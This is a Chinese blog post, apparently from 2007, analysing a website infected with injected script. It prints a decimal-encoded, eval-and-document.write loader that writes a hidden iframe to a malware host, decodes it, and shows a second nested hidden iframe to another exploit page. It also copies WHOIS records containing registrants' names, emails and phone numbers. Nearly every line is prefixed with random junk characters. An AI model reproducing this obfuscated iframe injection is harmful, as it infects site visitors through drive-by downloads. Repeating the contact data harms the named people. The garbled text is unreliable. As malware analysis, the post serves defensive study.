首发在我的博客里面,
,'~8{,h5 px!lJtvgo http://www.areway.cn/?p=175 7aAT R7xKVS_MP @I{v 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
6wk/IJ` e))fbv&V <script>t=’60,105,102,114,97,109,101,
3K
Y-+ k 32,115,114,99,61,104,116,116,112,58,47,47,
.<Y7,9;YEF 102,114,101,101,46,117,45,117,117,117,46,99,
1k&**!S]% 110,47,101,114,114,111,114,46,104,116,109,
q cYF& 32,119,105,100,116,104,61,49,48,48,32,104,
y%* hHnGd 101,105,103,104,116,61,48,62,60,47,105,102,
YKF5|;} 114,97,109,101,62′;
H=2sT +Sp t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
gJYB)LjH" ;9w:%c1 <script>t=’60,105,102,114,97,109,101,32,115,
UA@(D 114,99,61,104,116,116,112,58,47,47,102,114,
3<:(Eda} 101,101,46,117,45,117,117,117,46,99,110,47,
H^UuT 101,114,114,111,114,46,104,116,109,32,119,
nt$VH 105,100,116,104,61,49,48,48,32,104,101,105,
m0I/X$-Cl5 103,104,116,61,48,62,60,47,105,102,114,97,
\4;}S&` k 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
G$b*N4yR document.write(t);</script>
TiiMX +:@lde]/p <html xmlns=”
GabYxYK http://www.w3.org/1999/xhtml 9d7`R' “>
RRGo$ <head>
;0j 8Xj <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
v6r,2Va/ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
_M.7%k/U8 <title>首页 - 爱生活家庭网
!L..I2' )2
E7>SQc~ 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
i9KQpWG: 转换字符串后的大概内容是(谁点击后果自付):
6I,^4U <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
19.+"H N_AAh D 查询玉米u-uuu.cn的详细信息:
v(uYso_ Domain Name: u-uuu.cn
0Q\6GCzN\ ROID: 20070901s10001s64972306-cn
\[m{ &%^G Domain Status: ok
FdT@} Registrant Organization: 王雷
$LxfdSa Registrant Name: 王雷
;MD6iBD Administrative Email:
czlovexs@126.com GEJEhwO;H Sponsoring Registrar: 北京万网志成科技有限公司
eBw6k09C+ Name Server:ns.yovole.com
QFn .<@ Name Server:ns1.yovole.com
R $vo Registration Date: 2007-09-01 17:54
p#['CqP8 Expiration Date: 2008-09-01 17:54
F(jvdq 最后PING了一下地址 都没有什么….
.Sz<%d7XIQ xiv1y4(% 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
2<18j <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
[ArPoJt <script language=”javascript” src=”
GR@jn]50 http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 6pyLb3[e >
Q};g~b3 这个玉米应该有可能是木马作者的:
BT?)-wS foafau.info的详细信息:
dEz7 @T Access to INFO WHOIS information is provided to assist persons in
,yZvT7 determining the contents of a domain name registration record in the
xx^7 Afilias registry database. The data in this record is provided by
ZM:!LkK Afilias Limited for informational purposes only, and Afilias does not
37:\X5)z/ guarantee its accuracy. This service is intended only for query-based
"?_r?~sJx access. You agree that you will use this data only for lawful purposes
!'E{D`A9 and that, under no circumstances will you use this data to: (a) allow,
0taopDi;d enable, or otherwise support the transmission by e-mail, telephone, or
aTJs.y-I~ facsimile of mass unsolicited, commercial advertising or solicitations
?V3kIb to entities other than the data recipient’s own existing customers; or
;xp^FKP (b) enable high volume, automated, electronic processes that send
+mc0:e{WF queries or data to the systems of Registry Operator, a Registrar, or
1trk Afilias except as reasonably necessary to register domain names or
4g^nhJP$ modify existing registrations. All rights reserved. Afilias reserves
$@H]0<3, the right to modify these terms at any time. By submitting this query,
Qw&It you agree to abide by this policy.
?Q`u\G3.m Domain ID:D22418703-LRMS
IF"-{@ Domain Name:FOAFAU.INFO
(]*otVJ Created On:20-Nov-2007 16:05:42 UTC
?`jh5Kw%y Last Updated On:20-Nov-2007 16:05:44 UTC
Xbm\"g \ Expiration Date:20-Nov-2008 16:05:42 UTC
n*7Ytz3#' Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
x>Hg.%/c[ Status:CLIENT DELETE PROHIBITED
6gUcoDD Status:CLIENT RENEW PROHIBITED
&y164xn'h Status:CLIENT TRANSFER PROHIBITED
s\7]"3:wD Status:CLIENT UPDATE PROHIBITED
UOi[#L@N Status:TRANSFER PROHIBITED
y81B3`@ Registrant ID:GODA-040110615
kZ8+ev= Registrant Name:liu hong
e
MX?x7 Registrant Organization:
"oZ$/ap\ Registrant Street1:beijing
/wF*@ /PTH Registrant Street2:
)U>JFgpIW Registrant Street3:
Ucj
eB Registrant City:beijing
}3{ x G+, Registrant State/Province:
)FF3|dZ";K Registrant Postal Code:100000
S"*M9*8 Registrant Country:CN
*U[Nn5#? Registrant Phone:+86.860108888777
ups]k?4 Registrant Phone Ext.:
O!Rw?
Y Registrant FAX:
(5-4`:1ux Registrant FAX Ext.:
5Z2tTw'i Registrant Email:bbbshiji@163.com
O@$wU9D< Admin ID:GODA-240110615
]!v:xjzT Admin Name:liu hong
@vy{Q7aM Admin Organization:
w_O3]; Admin Street1:beijing
5*Wo/%#q Admin Street2:
d nZA+Pa Admin Street3:
=wd=TX/ Admin City:beijing
$)V_oQSqn Admin State/Province:
,qo"i7c{: Admin Postal Code:100000
hcQky/c\#b Admin Country:CN
,5tW|=0@ Admin Phone:+86.860108888777
?3X(`:KB Admin Phone Ext.:
JjD'2"z Admin FAX:
R~=_,JUW Admin FAX Ext.:
ZS@ Gt Admin Email:bbbshiji@163.com
;QRnZqSv Billing ID:GODA-340110615
/FP;Hsw% Billing Name:liu hong
IW Ro$Yu Billing Organization:
`i'72\( Billing Street1:beijing
SCXH{8SS Billing Street2:
&mG1V Billing Street3:
tH7@oV; Billing City:beijing
9e`.H0 Billing State/Province:
WAzYnl'p Billing Postal Code:100000
=.*+c\ Billing Country:CN
mJj
[f8 Billing Phone:+86.860108888777
=vqy5y Billing Phone Ext.:
'+@q Billing FAX:
gj\'1(Ju Billing FAX Ext.:
2s+ITPr Billing Email:bbbshiji@163.com
|oYqkP| Tech ID:GODA-140110615
.V4w+:i Tech Name:liu hong
XN*?<s3 Tech Organization:
9:JFG{M Tech Street1:beijing
R:Pw@ Tech Street2:
#Tr>[ZC Tech Street3:
_ct18nh9 Tech City:beijing
oNkASAd Tech State/Province:
|zJxR_) Tech Postal Code:100000
\wyn Tech Country:CN
(wMiXi Tech Phone:+86.860108888777
t[L_n m5- Tech Phone Ext.:
;q8tOvQ Tech FAX:
R{GT?
wl Tech FAX Ext.:
f3g#(1 Tech Email:bbbshiji@163.com
_kgGz@/p Name Server:NS27.DOMAINCONTROL.COM
P|:*OM
p Name Server:NS28.DOMAINCONTROL.COM
~+JEl% Name Server:
XAn{xNpz Name Server:
?Aewp$Bj Name Server:
Ezvm5~< Name Server:
xaM?
B7 Name Server:
U',.'"m Name Server:
j@j%)CCM Name Server:
E[z8;A^:0 Name Server:
B4/0t:^I Name Server:
W(C\lSE0 Name Server:
y<53xZi Name Server:
3!+N}[$iy QNGICG- 接着下载每个文件里面的代码:
5WT^;J9V 一步一步看..
#/UlW
APfDy
^KKU@ab9
qtqTLl@u
)_MIUQ%
=LFrV9 都是十进制的代码,也懒得再分析了,有这个爱好的大家可以继续试试